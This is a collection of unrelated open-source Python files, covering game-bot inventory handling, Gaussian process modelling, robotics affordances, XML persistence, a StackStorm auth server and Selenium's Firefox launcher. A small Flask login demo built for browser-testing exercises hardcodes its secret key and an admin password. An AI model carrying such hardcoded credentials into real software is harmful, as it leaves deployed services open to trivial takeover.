slot_a.item_id, slot_b.item_id = slot_b.item_id, slot_a.item_id
slot_a.damage, slot_b.damage = slot_b.damage, slot_a.damage
slot_a.amount, slot_b.amount = slot_b.amount, slot_a.amount
slot_a.nbt, slot_b.nbt = slot_b.nbt, slot_a.nbt
self.mark_dirty(slot_a)
self.mark_dirty(slot_b)
def transfer(self, from_slot, to_slot, max_amount):
transfer_amount = min(max_amount, from_slot.amount,
to_slot.item.stack_size - to_slot.amount)
if transfer_amount <= 0:
return
self.copy_slot_type(from_slot, to_slot)
to_slot.amount += transfer_amount
from_slot.amount -= transfer_amount
self.cleanup_if_empty(from_slot)
def cleanup_if_empty(self, slot):
if slot.is_empty:
empty_slot_at_same_position = Slot(slot.window, slot.slot_nr)
self.copy_slot_type(empty_slot_at_same_position, slot)
self.mark_dirty(slot)
def mark_dirty(self, slot):
self.dirty.add(slot)
class SingleClick(BaseClick):
def __init__(self, slot, button=constants.INV_BUTTON_LEFT):
self.slot = slot
self.button = button
if button not in (constants.INV_BUTTON_LEFT,
constants.INV_BUTTON_RIGHT):
raise NotImplementedError(
'Clicking with button %s not implemented' % button)
def get_packet(self, inv_plugin):
slot_nr = self.slot.slot_nr
if self.slot == inv_plugin.cursor_slot:
slot_nr = constants.INV_OUTSIDE_WINDOW
return {
'slot': slot_nr,
'button': self.button,
'mode': 0,
'clicked_item': self.slot.get_dict(),
}
def apply(self, inv_plugin):
clicked = self.slot
cursor = inv_plugin.cursor_slot
if clicked == cursor:
if self.button == constants.INV_BUTTON_LEFT:
clicked.amount = 0
elif self.button == constants.INV_BUTTON_RIGHT:
clicked.amount -= 1
self.cleanup_if_empty(clicked)
elif self.button == constants.INV_BUTTON_LEFT:
if clicked.stacks_with(cursor):
self.transfer(cursor, clicked, cursor.amount)
else:
self.swap_slots(cursor, clicked)
elif self.button == constants.INV_BUTTON_RIGHT:
if cursor.is_empty:
self.transfer(clicked, cursor, (clicked.amount + 1) // 2)
elif clicked.is_empty or clicked.stacks_with(cursor):
self.transfer(cursor, clicked, 1)
else:
self.swap_slots(cursor, clicked)
else:
raise NotImplementedError(
'Clicking with button %s not implemented' % self.button)
class DropClick(BaseClick):
def __init__(self, slot, drop_stack=False):
self.slot = slot
self.drop_stack = drop_stack
def get_packet(self, inv_plugin):
if self.slot == inv_plugin.cursor_slot:
raise ValueError("Can't drop cursor slot, use SingleClick")
if not inv_plugin.cursor_slot.is_empty:
raise ValueError("Can't drop other slots: cursor slot is occupied")
return {
'slot': self.slot.slot_nr,
'button': 1 if self.drop_stack else 0,
'mode': 4,
'clicked_item': inv_plugin.cursor_slot.get_dict(),
}
def apply(self, inv_plugin):
if self.drop_stack:
self.slot.amount = 0
else:
self.slot.amount -= 1
self.cleanup_if_empty(self.slot)
class Window(object):
""" Base class for all inventory types. """
name = None
inv_type = None
inv_data = {}
def __init__(self, window_id, title, slot_count,
inv_type=None, persistent_slots=None, eid=None):
assert not inv_type or inv_type == self.inv_type, \
'inv_type differs: %s instead of %s' % (inv_type, self.inv_type)
self.is_storage = slot_count > 0
if not self.is_storage:
window_dict = windows_by_id[inv_type]
if 'slots' in window_dict:
slot_count = max(slot['index'] + slot.get('size', 1)
for slot in window_dict['slots'])
self.window_id = window_id
self.title = title
self.eid = eid
self.slots = [Slot(self, slot_nr) for slot_nr in range(slot_count)]
if persistent_slots is None:
for slot_nr in range(constants.INV_SLOTS_PERSISTENT):
self.slots.append(Slot(self, slot_nr + slot_count))
else:
moved_slots = persistent_slots[-constants.INV_SLOTS_PERSISTENT:]
for slot_nr, moved_slot in enumerate(moved_slots):
moved_slot.move_to_window(self, slot_nr + slot_count)
self.slots.append(moved_slot)
self.properties = {}
def __repr__(self):
return '%s(window_id=%i, title=%s, slot_count=%i)' % (
self.__class__.__name__,
self.window_id, self.title, len(self.slots))
@property
def persistent_slots(self):
return self.slots[-constants.INV_SLOTS_PERSISTENT:]
@property
def inventory_slots(self):
return self.slots[
-constants.INV_SLOTS_PERSISTENT:-constants.INV_SLOTS_HOTBAR]
@property
def hotbar_slots(self):
return self.slots[-constants.INV_SLOTS_HOTBAR:]
@property
def window_slots(self):
"""All slots except inventory and hotbar. Useful for searching."""
return self.slots[:-constants.INV_SLOTS_PERSISTENT]
def _make_window(window_dict):
"""
Creates a new class for that window and registers it at this module.
"""
cls_name = '%sWindow' % camel_case(str(window_dict['name']))
bases = (Window,)
attrs = {
'__module__': sys.modules[__name__],
'name': str(window_dict['name']),
'inv_type': str(window_dict['id']),
'inv_data': window_dict,
}
def make_slot_method(index, size=1):
if size == 1:
return lambda self: self.slots[index]
else:
return lambda self: self.slots[index:(index + size)]
for slots in window_dict.get('slots', []):
index = slots['index']
size = slots.get('size', 1)
attr_name = snake_case(str(slots['name']))
attr_name += '_slot' if size == 1 else '_slots'
slots_method = make_slot_method(index, size)
slots_method.__name__ = attr_name
attrs[attr_name] = property(slots_method)
for i, prop_name in enumerate(window_dict.get('properties', [])):
def make_prop_method(i):
return lambda self: self.properties[i]
prop_method = make_prop_method(i)
prop_name = snake_case(str(prop_name))
prop_method.__name__ = prop_name
attrs[prop_name] = property(prop_method)
cls = type(cls_name, bases, attrs)
assert not hasattr(sys.modules[__name__], cls_name), \
'Window "%s" already registered at %s' % (cls_name, __name__)
setattr(sys.modules[__name__], cls_name, cls)
return cls
inv_types = {}
def _create_windows():
for window in windows_list:
cls = _make_window(window)
inv_types[cls.inv_type] = cls
_create_windows()
_player_window = sys.modules[__name__].PlayerWindow
def _player_init(self, *args, **kwargs):
super(_player_window, self).__init__(
constants.INV_WINID_PLAYER, self.name, constants.INV_SLOTS_PLAYER,
*args, **kwargs)
setattr(_player_window, '__init__', _player_init)
|
data/SheffieldML/GPy/GPy/models/warped_gp.py
|
import numpy as np
from ..util.warping_functions import *
from ..core import GP
from .. import likelihoods
from GPy.util.warping_functions import TanhWarpingFunction_d
from GPy import kern
class WarpedGP(GP):
def __init__(self, X, Y, kernel=None, warping_function=None, warping_terms=3):
if kernel is None:
kernel = kern.RBF(X.shape[1])
if warping_function == None:
self.warping_function = TanhWarpingFunction_d(warping_terms)
self.warping_params = (np.random.randn(self.warping_function.n_terms * 3 + 1) * 1)
else:
self.warping_function = warping_function
self.scale_data = False
if self.scale_data:
Y = self._scale_data(Y)
self.Y_untransformed = Y.copy()
self.predict_in_warped_space = True
likelihood = likelihoods.Gaussian()
GP.__init__(self, X, self.transform_data(), likelihood=likelihood, kernel=kernel)
self.link_parameter(self.warping_function)
def _scale_data(self, Y):
self._Ymax = Y.max()
self._Ymin = Y.min()
return (Y - self._Ymin) / (self._Ymax - self._Ymin) - 0.5
def _unscale_data(self, Y):
return (Y + 0.5) * (self._Ymax - self._Ymin) + self._Ymin
def parameters_changed(self):
self.Y[:] = self.transform_data()
super(WarpedGP, self).parameters_changed()
Kiy = self.posterior.woodbury_vector.flatten()
grad_y = self.warping_function.fgrad_y(self.Y_untransformed)
grad_y_psi, grad_psi = self.warping_function.fgrad_y_psi(self.Y_untransformed,
return_covar_chain=True)
djac_dpsi = ((1.0 / grad_y[:, :, None, None]) * grad_y_psi).sum(axis=0).sum(axis=0)
dquad_dpsi = (Kiy[:, None, None, None] * grad_psi).sum(axis=0).sum(axis=0)
warping_grads = -dquad_dpsi + djac_dpsi
self.warping_function.psi.gradient[:] = warping_grads[:, :-1]
self.warping_function.d.gradient[:] = warping_grads[0, -1]
def transform_data(self):
Y = self.warping_function.f(self.Y_untransformed.copy()).copy()
return Y
def log_likelihood(self):
ll = GP.log_likelihood(self)
jacobian = self.warping_function.fgrad_y(self.Y_untransformed)
return ll + np.log(jacobian).sum()
def plot_warping(self):
self.warping_function.plot(self.Y_untransformed.min(), self.Y_untransformed.max())
def _get_warped_term(self, mean, std, gh_samples, pred_init=None):
arg1 = gh_samples.dot(std.T) * np.sqrt(2)
arg2 = np.ones(shape=gh_samples.shape).dot(mean.T)
return self.warping_function.f_inv(arg1 + arg2, y=pred_init)
def _get_warped_mean(self, mean, std, pred_init=None, deg_gauss_hermite=100):
"""
Calculate the warped mean by using Gauss-Hermite quadrature.
"""
gh_samples, gh_weights = np.polynomial.hermite.hermgauss(deg_gauss_hermite)
gh_samples = gh_samples[:,None]
gh_weights = gh_weights[None,:]
return gh_weights.dot(self._get_warped_term(mean, std, gh_samples)) / np.sqrt(np.pi)
def _get_warped_variance(self, mean, std, pred_init=None, deg_gauss_hermite=100):
"""
Calculate the warped variance by using Gauss-Hermite quadrature.
"""
gh_samples, gh_weights = np.polynomial.hermite.hermgauss(deg_gauss_hermite)
gh_samples = gh_samples[:,None]
gh_weights = gh_weights[None,:]
arg1 = gh_weights.dot(self._get_warped_term(mean, std, gh_samples,
pred_init=pred_init) ** 2) / np.sqrt(np.pi)
arg2 = self._get_warped_mean(mean, std, pred_init=pred_init,
deg_gauss_hermite=deg_gauss_hermite)
return arg1 - (arg2 ** 2)
def predict(self, Xnew, which_parts='all', pred_init=None, full_cov=False, Y_metadata=None,
median=False, deg_gauss_hermite=100):
mu, var = GP._raw_predict(self, Xnew)
mean, var = self.likelihood.predictive_values(mu, var)
if self.predict_in_warped_space:
std = np.sqrt(var)
if median:
wmean = self.warping_function.f_inv(mean, y=pred_init)
else:
wmean = self._get_warped_mean(mean, std, pred_init=pred_init,
deg_gauss_hermite=deg_gauss_hermite).T
wvar = self._get_warped_variance(mean, std, pred_init=pred_init,
deg_gauss_hermite=deg_gauss_hermite).T
else:
wmean = mean
wvar = var
if self.scale_data:
pred = self._unscale_data(pred)
return wmean, wvar
def predict_quantiles(self, X, quantiles=(2.5, 97.5), Y_metadata=None):
"""
Get the predictive quantiles around the prediction at X
:param X: The points at which to make a prediction
:type X: np.ndarray (Xnew x self.input_dim)
:param quantiles: tuple of quantiles, default is (2.5, 97.5) which is the 95% interval
:type quantiles: tuple
:returns: list of quantiles for each X and predictive quantiles for interval combination
:rtype: [np.ndarray (Xnew x self.input_dim), np.ndarray (Xnew x self.input_dim)]
"""
m, v = self._raw_predict(X, full_cov=False)
if self.normalizer is not None:
m, v = self.normalizer.inverse_mean(m), self.normalizer.inverse_variance(v)
a, b = self.likelihood.predictive_quantiles(m, v, quantiles, Y_metadata)
if not self.predict_in_warped_space:
return [a, b]
new_a = self.warping_function.f_inv(a)
new_b = self.warping_function.f_inv(b)
return [new_a, new_b]
if __name__ == '__main__':
X = np.random.randn(100, 1)
Y = np.sin(X) + np.random.randn(100, 1)*0.05
m = WarpedGP(X, Y)
|
data/RobotLocomotion/director/src/python/director/affordanceitems.py
|
import director
import director.objectmodel as om
from director import visualization as vis
from director.visualization import PolyDataItem
from director import filterUtils
from director import ioUtils
from director import meshmanager
from director import transformUtils
from director.uuidutil import newUUID
from director.debugVis import DebugData
from director import vtkAll as vtk
import numpy as np
import os
import uuid
from collections import OrderedDict
class AffordanceItem(PolyDataItem):
COPY_MODE_ALL = 0
COPY_MODE_SKIP_LOCAL = 1
LOCAL_PROPERTY_NAMES = ('Visible')
def __init__(self, name, polyData, view):
PolyDataItem.__init__(self, name, polyData, view)
self.params = {}
self.addProperty('uuid', newUUID(), attributes=om.PropertyAttributes(hidden=True))
self.addProperty('Collision Enabled', True)
self.addProperty('Origin', [0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], attributes=om.PropertyAttributes(hidden=True))
self.addProperty('Camera Texture Enabled', False)
self.properties.setPropertyIndex('Collision Enabled', 0)
self.setProperty('Icon', om.Icons.Hammer)
def getPose(self):
childFrame = self.getChildFrame()
t = childFrame.transform if childFrame else vtk.vtkTransform()
return transformUtils.poseFromTransform(t)
def getDescription(self):
d = OrderedDict()
d['classname'] = type(self).__name__
d.update(self.properties._properties)
d['pose'] = self.getPose()
return d
def _onPropertyChanged(self, propertySet, propertyName):
PolyDataItem._onPropertyChanged(self, propertySet, propertyName)
if propertyName == 'Origin':
self.updateGeometryFromProperties()
def updateGeometryFromProperties():
pass
def setPolyData(self, polyData):
if polyData.GetNumberOfPoints():
originPose = self.getProperty('Origin')
pos, quat = originPose[:3], originPose[3:]
t = transformUtils.transformFromPose(pos, quat)
polyData = filterUtils.transformPolyData(polyData, t.GetLinearInverse())
PolyDataItem.setPolyData(self, polyData)
def repositionFromDescription(self, desc):
position, quat = desc['pose']
t = transformUtils.transformFromPose(position, quat)
self.getChildFrame().copyFrame(t)
def loadDescription(self, desc, copyMode=COPY_MODE_ALL):
self.syncProperties(desc, copyMode)
self.repositionFromDescription(desc)
self._renderAllViews()
def syncProperties(self, desc, copyMode=COPY_MODE_ALL):
for propertyName, propertyValue in desc.iteritems():
if copyMode == self.COPY_MODE_SKIP_LOCAL:
if propertyName in self.LOCAL_PROPERTY_NAMES:
continue
if self.hasProperty(propertyName) and (self.getProperty(propertyName) != propertyValue):
self.setProperty(propertyName, propertyValue)
def onRemoveFromObjectModel(self):
PolyDataItem.onRemoveFromObjectModel(self)
class BoxAffordanceItem(AffordanceItem):
def __init__(self, name, view):
AffordanceItem.__init__(self, name, vtk.vtkPolyData(), view)
self.addProperty('Dimensions', [0.25, 0.25, 0.25], attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
self.addProperty('Subdivisions', 0, attributes=om.PropertyAttributes(minimum=0, maximum=1000))
self.properties.setPropertyIndex('Dimensions', 0)
self.properties.setPropertyIndex('Subdivisions', 1)
self.updateGeometryFromProperties()
def updateGeometryFromProperties(self):
d = DebugData()
d.addCube(self.getProperty('Dimensions'), (0,0,0), subdivisions=self.getProperty('Subdivisions'))
self.setPolyData(d.getPolyData())
def _onPropertyChanged(self, propertySet, propertyName):
AffordanceItem._onPropertyChanged(self, propertySet, propertyName)
if propertyName in ('Dimensions', 'Subdivisions'):
self.updateGeometryFromProperties()
class SphereAffordanceItem(AffordanceItem):
def __init__(self, name, view):
AffordanceItem.__init__(self, name, vtk.vtkPolyData(), view)
self.addProperty('Radius', 0.15, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
self.properties.setPropertyIndex('Radius', 0)
self.updateGeometryFromProperties()
def updateGeometryFromProperties(self):
d = DebugData()
d.addSphere((0,0,0), self.getProperty('Radius'))
self.setPolyData(d.getPolyData())
def _onPropertyChanged(self, propertySet, propertyName):
AffordanceItem._onPropertyChanged(self, propertySet, propertyName)
if propertyName == 'Radius':
self.updateGeometryFromProperties()
class CylinderAffordanceItem(AffordanceItem):
def __init__(self, name, view):
AffordanceItem.__init__(self, name, vtk.vtkPolyData(), view)
self.addProperty('Radius', 0.03, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
self.addProperty('Length', 0.5, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
self.properties.setPropertyIndex('Radius', 0)
self.properties.setPropertyIndex('Length', 1)
self.updateGeometryFromProperties()
def updateGeometryFromProperties(self):
d = DebugData()
length = self.getProperty('Length')
d.addCylinder(center=(0,0,0), axis=(0,0,1), length=self.getProperty('Length'), radius=self.getProperty('Radius'))
self.setPolyData(d.getPolyData())
def _onPropertyChanged(self, propertySet, propertyName):
AffordanceItem._onPropertyChanged(self, propertySet, propertyName)
if propertyName in ('Length', 'Radius'):
self.updateGeometryFromProperties()
class CapsuleAffordanceItem(AffordanceItem):
def __init__(self, name, view):
AffordanceItem.__init__(self, name, vtk.vtkPolyData(), view)
self.addProperty('Radius', 0.03, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
self.addProperty('Length', 0.5, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
self.properties.setPropertyIndex('Radius', 0)
self.properties.setPropertyIndex('Length', 1)
self.updateGeometryFromProperties()
def updateGeometryFromProperties(self):
d = DebugData()
length = self.getProperty('Length')
d.addCapsule(center=(0,0,0), axis=(0,0,1), length=self.getProperty('Length'), radius=self.getProperty('Radius'))
self.setPolyData(d.getPolyData())
def _onPropertyChanged(self, propertySet, propertyName):
AffordanceItem._onPropertyChanged(self, propertySet, propertyName)
if propertyName in ('Length', 'Radius'):
self.updateGeometryFromProperties()
class CapsuleRingAffordanceItem(AffordanceItem):
def __init__(self, name, view):
AffordanceItem.__init__(self, name, vtk.vtkPolyData(), view)
self.setProperty('Collision Enabled', False)
self.addProperty('Radius', 0.15, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
self.addProperty('Tube Radius', 0.02, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
self.addProperty('Segments', 8, attributes=om.PropertyAttributes(decimals=3, singleStep=1, minimum=3, maximum=100))
self.properties.setPropertyIndex('Radius', 0)
self.properties.setPropertyIndex('Tube Radius', 1)
self.properties.setPropertyIndex('Segments', 2)
self.updateGeometryFromProperties()
def updateGeometryFromProperties(self):
radius = self.getProperty('Radius')
circlePoints = np.linspace(0, 2*np.pi, self.getProperty('Segments')+1)
spokes = [(0.0, np.sin(x), np.cos(x)) for x in circlePoints]
spokes = [radius*np.array(x)/np.linalg.norm(x) for x in spokes]
d = DebugData()
for a, b in zip(spokes, spokes[1:]):
d.addCapsule(center=(a+b)/2.0, axis=(b-a), length=np.linalg.norm(b-a), radius=self.getProperty('Tube Radius'))
self.setPolyData(d.getPolyData())
def _onPropertyChanged(self, propertySet, propertyName):
AffordanceItem._onPropertyChanged(self, propertySet, propertyName)
if propertyName in ('Radius', 'Tube Radius', 'Segments'):
self.updateGeometryFromProperties()
class MeshAffordanceItem(AffordanceItem):
_meshManager = None
def __init__(self, name, view):
AffordanceItem.__init__(self, name, vtk.vtkPolyData(), view)
self.setProperty('Collision Enabled', False)
self.addProperty('Filename', '')
self.properties.setPropertyIndex('Filename', 0)
if self.getProperty('Filename') and not self.polyData.GetNumberOfPoints():
self.updateGeometryFromProperties()
def updateGeometryFromProperties(self):
filename = self.getProperty('Filename')
if not filename:
polyData = vtk.vtkPolyData()
else:
polyData = self.getMeshManager().get(filename)
if not polyData:
if not os.path.isabs(filename):
filename = os.path.join(director.getDRCBaseDir(), filename)
if os.path.isfile(filename):
polyData = ioUtils.readPolyData(filename)
else:
d = DebugData()
d.addFrame(vtk.vtkTransform(), scale=0.1, tubeRadius=0.005)
polyData = d.getPolyData()
self.setPolyData(polyData)
@classmethod
def getMeshManager(cls):
if cls._meshManager is None:
cls._meshManager = meshmanager.MeshManager()
return cls._meshManager
@classmethod
def promotePolyDataItem(cls, obj):
parent = obj.parent()
view = obj.views[0]
name = obj.getProperty('Name')
polyData = obj.polyData
props = obj.properties._properties
childFrame = obj.getChildFrame()
if childFrame:
t = transformUtils.copyFrame(childFrame.transform)
else:
t = vtk.vtkTransform()
t.PostMultiply()
t.Translate(filterUtils.computeCentroid(polyData))
polyData = filterUtils.transformPolyData(polyData, t.GetLinearInverse())
children = [c for c in obj.children() if c is not childFrame]
meshId = cls.getMeshManager().add(polyData)
om.removeFromObjectModel(obj)
obj = MeshAffordanceItem(name, view)
obj.setProperty('Filename', meshId)
om.addToObjectModel(obj, parentObj=parent)
frame = vis.addChildFrame(obj)
frame.copyFrame(t)
for child in children:
om.addToObjectModel(child, parentObj=obj)
obj.syncProperties(props)
return obj
def _onPropertyChanged(self, propertySet, propertyName):
AffordanceItem._onPropertyChanged(self, propertySet, propertyName)
if propertyName == 'Filename':
self.updateGeometryFromProperties()
class FrameAffordanceItem(AffordanceItem):
def setAffordanceParams(self, params):
self.params = params
def updateParamsFromActorTransform(self):
t = self.actor.GetUserTransform()
xaxis = np.array(t.TransformVector([1,0,0]))
yaxis = np.array(t.TransformVector([0,1,0]))
zaxis = np.array(t.TransformVector([0,0,1]))
self.params['xaxis'] = xaxis
self.params['yaxis'] = yaxis
self.params['zaxis'] = zaxis
self.params['origin'] = t.GetPosition()
|
data/VisTrails/VisTrails/vistrails/db/versions/v0_7_0/persistence/xml/xml_dao.py
|
from __future__ import division
from datetime import date, datetime
from vistrails.core.system import strftime, time_strptime
class XMLDAO:
def __init__(self):
pass
def hasAttribute(self, node, attr):
return node.hasAttribute(attr)
def getAttribute(self, node, attr):
try:
attribute = node.attributes.get(attr)
if attribute is not None:
return attribute.value
except KeyError:
pass
return None
def convertFromStr(self, value, type):
if value is not None:
if type == 'str':
return str(value)
elif value.strip() != '':
if type == 'long':
return long(value)
elif type == 'float':
return float(value)
elif type == 'int':
return int(value)
elif type == 'date':
return date(*time_strptime(value, '%Y-%m-%d')[0:3])
elif type == 'datetime':
return datetime(*time_strptime(value, '%Y-%m-%d %H:%M:%S')[0:6])
return None
def convertToStr(self, value, type):
if value is not None:
if type == 'date':
return value.isoformat()
elif type == 'datetime':
return strftime(value, '%Y-%m-%d %H:%M:%S')
else:
return str(value)
return ''
|
data/SumitBisht/RobotFrameworkTestAutomation/Ch4/seleniumTest/src/flaskApp/hello.py
|
from flask import Flask, request, render_template, flash, redirect, url_for
app = Flask(__name__)
app.secret_key = 'AXAPBswe4B'
@app.route('/')
def login():
return render_template('login.html')
@app.route('/secure', methods=['POST'])
def secured():
user = request.form['username']
password = request.form['password']
if(user == "admin" and password == "s3cur3"):
flash("Logged in successfully")
return render_template('secure.html')
else:
flash("Error while logging in with "+user)
return redirect(url_for('login'))
if __name__ == '__main__':
app.run(debug=True)
|
data/ResilientScience/wot/wot/dimer.py
|
import sys
import fileinput
import itertools
ALPHABET = ("A", "C", "G", "T")
def sequence_count(string, wordlength):
"""Return a frequency count of all sequences of a given size found in a string.
"""
i = 0
wc = {}
while i < len(string) - wordlength + 1:
word = string[i:i+wordlength]
if word in wc:
wc[word] += 1
else:
wc[word] = 1
i += 1
return wc
def pretty_print(wordcount_dict, wordlength):
"""This prints out the wordcount index in order to mimic the R1.BAS output format.
"""
output = ""
e = 0
for w in itertools.product(ALPHABET, repeat=wordlength):
w = ''.join(w)
try:
output += "%3.10s%13s\n" % (e, wordcount_dict[w])
except IndexError:
output += "%s\t0\n"
e += 1
return output
def histogram(filename, wordlength):
"""Returns a histogram report that meets NIHCC's format.
This function returns a string that is compatible with the example code
used Jim Deleo's Scientific Computing group at the NIH Clinical Center.
'Pick a standard, any standard', we'll we've agreed to use this.
"""
wc = {}
for line in open(filename).readlines():
wcnew = sequence_count(line, wordlength)
wc = {i: wc.get(i, 0) + wcnew.get(i, 0) for i in set(wc) | set(wcnew)}
return pretty_print(wc, wordlength)
if __name__ == "__main__":
print histogram(sys.argv[1], 3)
|
data/StackStorm/st2/st2auth/st2auth/cmd/api.py
|
import eventlet
import os
import sys
from oslo_config import cfg
from eventlet import wsgi
from st2common import log as logging
from st2common.service_setup import setup as common_setup
from st2common.service_setup import teardown as common_teardown
from st2common.util.monkey_patch import monkey_patch
from st2common.constants.auth import VALID_MODES
from st2auth import config
config.register_opts()
from st2auth import app
__all__ = [
'main'
]
monkey_patch()
LOG = logging.getLogger(__name__)
def _setup():
common_setup(service='auth', config=config, setup_db=True, register_mq_exchanges=False,
register_signal_handlers=True, register_internal_trigger_types=False,
run_migrations=False)
if cfg.CONF.auth.mode not in VALID_MODES:
raise ValueError('Valid modes are: %s' % (','.join(VALID_MODES)))
def _run_server():
host = cfg.CONF.auth.host
port = cfg.CONF.auth.port
use_ssl = cfg.CONF.auth.use_ssl
cert_file_path = os.path.realpath(cfg.CONF.auth.cert)
key_file_path = os.path.realpath(cfg.CONF.auth.key)
if use_ssl and not os.path.isfile(cert_file_path):
raise ValueError('Certificate file "%s" doesn\'t exist' % (cert_file_path))
if use_ssl and not os.path.isfile(key_file_path):
raise ValueError('Private key file "%s" doesn\'t exist' % (key_file_path))
socket = eventlet.listen((host, port))
if use_ssl:
socket = eventlet.wrap_ssl(socket,
certfile=cert_file_path,
keyfile=key_file_path,
server_side=True)
LOG.info('ST2 Auth API running in "%s" auth mode', cfg.CONF.auth.mode)
LOG.info('(PID=%s) ST2 Auth API is serving on %s://%s:%s.', os.getpid(),
'https' if use_ssl else 'http', host, port)
wsgi.server(socket, app.setup_app())
return 0
def _teardown():
common_teardown()
def main():
try:
_setup()
return _run_server()
except SystemExit as exit_code:
sys.exit(exit_code)
except Exception:
LOG.exception('(PID=%s) ST2 Auth API quit due to exception.', os.getpid())
return 1
finally:
_teardown()
|
data/SEED-platform/seed/setup.py
|
from setuptools import setup, find_packages
setup(
name='seed',
version='0.1.0',
packages=find_packages(),
url='',
license='revised BSD',
author='Richard Brown',
author_email='rebrown@lbl.gov',
description='The SEED Platform is a web-based application that helps organizations easily manage data on the energy performance of large groups of buildings.',
scripts=['bin/seedutil']
)
|
data/PyHDI/veriloggen/tests/core/systemtask/systemtask.py
|
from __future__ import absolute_import
from __future__ import print_function
import sys
import os
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))
from veriloggen import *
def mkLed():
m = Module('blinkled')
width = m.Parameter('WIDTH', 8)
clk = m.Input('CLK')
rst = m.Input('RST')
led = m.OutputReg('LED', width)
count = m.Reg('count', 32)
m.Always(Posedge(clk))(
If(rst)(
count(0)
).Else(
If(count == 1023)(
count(0)
).Else(
count(count + 1)
)
))
m.Always(Posedge(clk))(
If(rst)(
led(0)
).Else(
If(count == 1024 - 1)(
led(led + 1),
SingleStatement(SystemTask('display', 'led:%x', led))
)
))
return m
if __name__ == '__main__':
led = mkLed()
verilog = led.to_verilog()
print(verilog)
|
data/RoseOu/flasky/venv/lib/python2.7/site-packages/selenium/webdriver/firefox/firefox_binary.py
|
import os
import platform
from subprocess import Popen, STDOUT
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.common import utils
import time
class FirefoxBinary(object):
NO_FOCUS_LIBRARY_NAME = "x_ignore_nofocus.so"
def __init__(self, firefox_path=None, log_file=None):
"""
Creates a new instance of Firefox binary.
:Args:
- firefox_path - Path to the Firefox executable. By default, it will be detected from the standard locations.
- log_file - A file object to redirect the firefox process output to. It can be sys.stdout.
Please note that with parallel run the output won't be synchronous.
By default, it will be redirected to /dev/null.
"""
self._start_cmd = firefox_path
self._log_file = log_file or open(os.devnull, "wb")
self.command_line = None
if self._start_cmd is None:
self._start_cmd = self._get_firefox_start_cmd()
if not self._start_cmd.strip():
raise Exception("Failed to find firefox binary. You can set it by specifying the path to 'firefox_binary':\n\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\n\n" +
"binary = FirefoxBinary('/path/to/binary')\ndriver = webdriver.Firefox(firefox_binary=binary)")
self._firefox_env = os.environ.copy()
self._firefox_env["MOZ_CRASHREPORTER_DISABLE"] = "1"
self._firefox_env["MOZ_NO_REMOTE"] = "1"
self._firefox_env["NO_EM_RESTART"] = "1"
def add_command_line_options(self, *args):
self.command_line = args
def launch_browser(self, profile):
"""Launches the browser for the given profile name.
It is assumed the profile already exists.
"""
self.profile = profile
self._start_from_profile_path(self.profile.path)
self._wait_until_connectable()
def kill(self):
"""Kill the browser.
This is useful when the browser is stuck.
"""
if self.process:
self.process.kill()
self.process.wait()
def _start_from_profile_path(self, path):
self._firefox_env["XRE_PROFILE_PATH"] = path
if platform.system().lower() == 'linux':
self._modify_link_library_path()
command = [self._start_cmd, "-silent"]
if self.command_line is not None:
for cli in self.command_line:
command.append(cli)
Popen(command, stdout=self._log_file, stderr=STDOUT,
env=self._firefox_env).communicate()
command[1] = '-foreground'
self.process = Popen(
command, stdout=self._log_file, stderr=STDOUT,
env=self._firefox_env)
def _wait_until_connectable(self):
"""Blocks until the extension is connectable in the firefox."""
count = 0
while not utils.is_connectable(self.profile.port):
if self.process.poll() is not None:
raise WebDriverException("The browser appears to have exited "
"before we could connect. If you specified a log_file in "
"the FirefoxBinary constructor, check it for details.")
if count == 30:
self.kill()
raise WebDriverException("Can't load the profile. Profile "
"Dir: %s If you specified a log_file in the "
"FirefoxBinary constructor, check it for details.")
count += 1
time.sleep(1)
return True
def _find_exe_in_registry(self):
try:
from _winreg import OpenKey, QueryValue, HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER
except ImportError:
from winreg import OpenKey, QueryValue, HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER
import shlex
keys = (
r"SOFTWARE\Classes\FirefoxHTML\shell\open\command",
r"SOFTWARE\Classes\Applications\firefox.exe\shell\open\command"
)
command = ""
for path in keys:
try:
key = OpenKey(HKEY_LOCAL_MACHINE, path)
command = QueryValue(key, "")
break
except OSError:
try:
key = OpenKey(HKEY_CURRENT_USER, path)
command = QueryValue(key, "")
break
except OSError:
pass
else:
return ""
if not command:
return ""
return shlex.split(command)[0]
def _get_firefox_start_cmd(self):
"""Return the command to start firefox."""
start_cmd = ""
if platform.system() == "Darwin":
start_cmd = ("/Applications/Firefox.app/Contents/MacOS/firefox-bin")
elif platform.system() == "Windows":
start_cmd = (self._find_exe_in_registry() or
self._default_windows_location())
elif platform.system() == 'Java' and os._name == 'nt':
start_cmd = self._default_windows_location()
else:
for ffname in ["firefox", "iceweasel"]:
start_cmd = self.which(ffname)
if start_cmd is not None:
break
else:
raise RuntimeError("Could not find firefox in your system PATH." +
" Please specify the firefox binary location or install firefox")
return start_cmd
def _default_windows_location(self):
program_files = [os.getenv("PROGRAMFILES", r"C:\Program Files"),
os.getenv("PROGRAMFILES(X86)", r"C:\Program Files (x86)")]
for path in program_files:
binary_path = os.path.join(path, r"Mozilla Firefox\firefox.exe")
if os.access(binary_path, os.X_OK):
return binary_path
return ""
def _modify_link_library_path(self):
existing_ld_lib_path = os.environ.get('LD_LIBRARY_PATH', '')
new_ld_lib_path = self._extract_and_check(
self.profile, self.NO_FOCUS_LIBRARY_NAME, "x86", "amd64")
new_ld_lib_path += existing_ld_lib_path
self._firefox_env["LD_LIBRARY_PATH"] = new_ld_lib_path
